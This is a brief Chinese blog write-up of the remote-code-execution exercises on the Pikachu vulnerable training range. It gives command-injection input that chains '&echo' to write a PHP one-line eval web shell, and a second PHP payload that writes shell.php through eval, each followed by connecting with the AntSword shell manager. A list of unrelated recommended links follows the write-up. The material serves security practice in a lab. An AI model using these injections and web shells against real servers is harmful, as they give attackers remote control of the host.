Pikachu靶场之RCE漏洞详解

2407-2 shw2024-09-08 16:15

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
瘾大侠21 分钟前
WingData
网络·安全·web安全·网络安全
志栋智能31 分钟前
自动化运维真的只能选复杂平台吗?
运维·网络·数据库·人工智能·自动化
AC赳赳老秦32 分钟前
低代码AI化革命:DeepSeek引领智能开发新纪元
网络·人工智能·安全·web安全·低代码·prometheus·deepseek
月明长歌33 分钟前
Java 网络编程套接字入门:从“发一段数据”到“写一个可并发的服务器”
java·服务器·网络
冗量40 分钟前
《性能之巅》第七章:内存 读书笔记
服务器·性能优化·性能调优
呉師傅44 分钟前
【操作技巧】Win10关机提示这个应用阻止关机。怎么解决?
运维·网络·windows·电脑
Trouvaille ~1 小时前
【Linux】网络进阶:NAT技术与代理服务器详解
linux·运维·网络·nginx·ip·nat·代理服务器
浩浩测试一下1 小时前
PE结构 ----> PE结构基础知识点汇总(与安全开发关联)
安全·网络安全·pe·windowspe·pe基础格式
Codefengfeng1 小时前
binwalk提取文件时无输出文件夹(kali-linux环境)
linux·运维·服务器
我送炭你添花1 小时前
工业自动化大全(目录)持续更新中
运维·自动化
热门推荐
01从零搭建一个 PHP 登录注册系统(含完整源码)02使用 1panel面板 部署 php网站03GitHub 镜像站点04AI Agent 平台横评:ZeroClaw vs OpenClaw vs Nanobot05MIUI显示/隐藏5G开关的方法,信号弱时开启手机Wifi通话方法06PHP Error: 常见错误及其解决方法07Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services08openClaw安装飞书插件|核心踩坑:spawn EINVAL 错误终极解决指南09如何将 TRAE IDE 的插件市场源切换至 VS Code 官方市场10全面体验 Grok API 中转站(2025 · Grok 4 系列最新版)